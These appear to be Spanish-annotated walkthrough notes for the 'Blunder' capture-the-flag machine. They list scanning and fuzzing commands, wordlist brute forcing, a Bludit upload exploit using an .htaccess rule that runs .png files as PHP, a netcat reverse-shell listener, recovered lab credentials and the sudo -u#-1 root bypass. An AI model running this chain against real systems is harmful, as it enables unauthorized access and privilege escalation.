nmap -A -p- -oA output 10.129.95.225 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA blunder 10.129.95.225

nmap -sU -O -p- -oA blunder-udp 10.129.95.225

nikto -h 10.129.95.225:80

Pasted image 20220129171610.png

Pasted image 20220129171727.png

whatweb http://10.129.95.225

Pasted image 20220129171855.png

searchsploit bludit

Pasted image 20220129172110.png

http://10.129.95.225

Pasted image 20220129172216.png

wfuzz -c -t 400 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.95.225/FUZZ

Pasted image 20220129172814.png

http://10.129.95.225/admin

Pasted image 20220129172835.png

http://10.129.95.225/todo.txt

Pasted image 20220129173344.png

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u "http://10.129.95.225/FUZZ" -e .txt -t 30

Pasted image 20220129173639.png Pasted image 20220129173702.png

cewl -w dictionary.txt http://10.129.95.225

Pasted image 20220129184022.png

python3 bruteforcer.py

Credenciales-> fergus:RolandDeschain

Pasted image 20220129184449.png

http://10.129.95.225/admin/dashboard

Pasted image 20220129184523.png

cat bruteforcer.py

Pasted image 20220129184807.png Pasted image 20220129184830.png

searchsploit -m 48701

Pasted image 20220129185023.png

cat bludit_exploit.py

cat evil.png

Pasted image 20220129191440.png

echo "RewriteEngine off" > .htaccess

echo "Addtype application/x-httpd-php .png" >> .htaccess

python3 bludit_exploit.py

Pasted image 20220129191927.png

http://10.129.95.225/bl-content/tmp/temp/

Pasted image 20220129192243.png

nc -lvnp 443

Pasted image 20220130203407.png

Credenciales-> hugo:Password120

Pasted image 20220130203554.png

su hugo

sudo -l

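sudo -u\#-1 /bin/bash   # presumably the sudo -l output shows a rule allowing any user except root; older sudo builds resolve user ID -1 to 0, so that exclusion is bypassed (patched in current sudo releases)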

Pasted image 20220130203823.png
